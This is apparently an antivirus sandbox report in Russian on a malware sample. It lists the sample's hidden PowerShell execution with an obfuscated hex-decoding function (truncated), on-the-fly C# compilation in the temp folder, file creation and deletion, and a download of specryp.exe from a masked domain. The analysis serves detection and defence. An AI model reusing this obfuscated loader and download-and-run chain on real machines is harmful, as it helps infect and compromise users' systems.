Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function wbb456 {param($p4e61)$e1d21='g6c36';$w8b9bd='';for ($i=0; $i -lt $p4e61.length;$i+=2){$xdd2b=[convert]::ToByte($p4e61.Substring($i,2),16);$w8b9bd+=[char]($xdd2b -...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\znws_7xw.0.cs
- %TEMP%\znws_7xw.cmdline
- %TEMP%\znws_7xw.out
- %TEMP%\cscfeb.tmp
- %TEMP%\resfec.tmp
- %TEMP%\znws_7xw.dll
Удаляет следующие файлы
- %TEMP%\resfec.tmp
- %TEMP%\cscfeb.tmp
- %TEMP%\znws_7xw.out
- %TEMP%\znws_7xw.cmdline
- %TEMP%\znws_7xw.0.cs
- %TEMP%\znws_7xw.dll
- %TEMP%\znws_7xw.pdb
Сетевая активность
TCP
Запросы HTTP GET
- http://di##.com.sa/specryp.exe
UDP
- DNS ASK di##.com.sa
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function wbb456 {param($p4e61)$e1d21='g6c36';$w8b9bd='';for ($i=0; $i -lt $p4e61.length;$i+=2){$xdd2b=[convert]::ToByte($p4e61.Substring($i,2),16);$w8b9bd+=[char]($xdd2b -...' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\znws_7xw.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESFEC.tmp" "%TEMP%\CSCFEB.tmp"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\znws_7xw.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESFEC.tmp" "%TEMP%\CSCFEB.tmp"
